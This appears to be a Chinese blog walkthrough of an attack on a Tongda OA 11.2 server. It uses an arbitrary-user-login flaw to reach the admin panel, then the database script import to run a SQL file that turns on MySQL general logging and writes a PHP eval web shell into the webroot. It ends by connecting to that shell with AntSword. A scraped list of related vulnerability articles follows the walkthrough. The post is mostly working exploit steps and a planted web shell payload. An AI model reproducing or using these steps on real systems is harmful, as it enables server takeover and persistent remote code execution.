漏洞发现

在线搜索通达oa漏洞,发现通达OA前台任意用户登录漏洞https://blog.csdn.net/xuandao_ahfengren/article/details/110233044,成功进入后台。

寻找文件上传点

菜单–》系统管理–》数据库管理–》数据库脚本导入

上传文件为shell.sql

内容如下:
set global general_log = on;
set global general_log_file =‘C://TDOA/webroot//abc.php’;
select ‘<?php eval($_POST[11]);?>’;
set global general_log = off;

访问abc.php

成功上传文件

getshell

使用蚁剑进行连接,地址为http://192.168.110.91/abc.php
成功getshell

通达OA11.2漏洞复现相关推荐

  1. Web渗透实例复现(一)(通达OA11.2)

    以通达OA系统11.2版本为案例的Web渗透 1. 渗透背景: 2. 存在漏洞 3. 漏洞复现 3.1 前台任意用户登录漏洞 3.1.1 漏洞原理: 3.1.2 手工抓包复现: 3.1.3 POC自动 ...

  2. 通达+oa+php+文件+乱,通达OA任意文件删除/OA未授权访问+任意文件上传RCE漏洞复现...

    0x00 简介 通达OA采用基于WEB的企业计算,主HTTP服务器采用了世界上最先进的Apache服务器,性能稳定可靠.数据存取集中控制,避免了数据泄漏的可能.提供数据备份工具,保护系统数据安全.多级 ...

  3. 通达OA 任意用户登录漏洞复现

    0x00 漏洞描述 该漏洞类型为任意用户伪造,未经授权的远程攻击者可以通过精心构造的请求包进行任意用户伪造登录. 0x01 影响版本 通达OA < 11.5.200417 版本 通达OA 201 ...

  4. 通达OA任意用户登录漏洞复现

    目录 通达OA任意用户登录漏洞 漏洞描述 影响范围 漏洞复现 通达OA任意用户登录漏洞

  5. 【漏洞复现】通达OA v11.7 在线任意用户登录漏洞

    0x00 前言 通达OA V11.7版本存在这任意用户登录漏洞,该漏洞需要管理员在线才可以登录系统,另外一个方面就是编译在线的uid值进行判断. 具体fofa语法放在下面: app="TDX ...

  6. 通达OA 11.5 SQL注入漏洞复现

    0x00 漏洞描述 通达OA 11.5存在sql注入 0x01 漏洞影响版本 通达oa 11.5 0x02 漏洞复现 1.下载通达OA 11.5 https://cdndown.tongda2000. ...

  7. 通达OA前台任意用户伪造登录漏洞复现

    0x01简介 北京通达信科科技有限公司是一支以管理软件研发.实施.服务与咨询为主营业务的高科技企业,隶属于世界500强企业中国兵器工业集团公司. 2019最值得购买的OA系统排名 通达OA采用基于WE ...

  8. 通达OA v11.9 getdata任意命令执行漏洞复现+利用

    1.产品简介 通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台.包括流程审批.行政办 ...

  9. 通达OA v11.7 auth_mobi.php 在线用户登录漏洞复现

    通达OA v11.7 auth_mobi.php 在线用户登录漏洞复现 一.前言 通达OA,Office Anywhere的首字母,是通达信科旗下的品牌.通达OA v11.7 中存在某接口查询在线用户 ...

  10. 通达OA文件上传+文件包含导致远程代码执行漏洞复现

    漏洞说明 通达OA是一套办公系统.近日通达OA官方在其官方论坛披露了近期一起通达OA用户服务器遭受勒索病毒攻击事件并发布了多个版本的漏洞补丁.漏洞类型为任意文件上传,受影响的版本存在文件包含漏洞. 未 ...

最新文章

  1. ETC核心技术团队CTO空降上海,引领高校区块链技术风潮
  2. android textview 常用属性id,Android TextView常用属性
  3. 模型可解释性-贝叶斯方法
  4. 这6种性格的人不适合做数据分析
  5. java复选框批量删除_vue+element+Java实现批量删除功能
  6. ASP.NET实现多域名多网站共享Session值
  7. 一念心动,一生绵延——如何修复min pulse width?
  8. winform的ftp方式上传
  9. 【大数据部落】 用机器学习识别不断变化的股市状况—隐马尔可夫模型(HMM)股票指数预测实战
  10. android8.0 苹果,外媒:看完Android8.0 这次是谷歌抄苹果
  11. mysql 字符串拼接 null_mysql字符串拼接并设置null值的实例方法
  12. 【数据分析】最常用的数据分析方法(干货)
  13. postgresql和es_Apache的气流和PostgreSQL与码头工人和码头工人组成
  14. 电销卡在哪里办理,有用过的没
  15. uniapp开发微信小程序腾讯地图功能,生成地点云的sig签名
  16. 用MATLAB作微粉环节,电力系统分析理论课本习题MATLAB做.doc
  17. 计算机机房装修效果图,机房布线效果图
  18. matlab读取jra55数据,[转载][原创]灰色关联分析及Matlab程序实现
  19. matlab学习创建变量定义函数
  20. “独裁”的张小龙和他的微信帝国诞生记

热门文章

  1. 基于javacv的视频转码(升级版)
  2. java数字金额大写金额_Java将数字金额转为大写中文金额
  3. c语言__100以内的奇数
  4. 反向题在测试问卷信效度_防御方式问卷 (DSQ)信度和效度研究
  5. Axure RP使用攻略--入门级(一)
  6. c语言大作业酒店管理系统,管理信息系统大作业《酒店管理系统》.doc
  7. EZ-webshell
  8. 用指针将字符串逆序输出
  9. 读书笔记202208 TRC2010 Multi-agent model predictive control of signaling split in urban traffic networks
  10. 将数据与OpenLayers结合在一起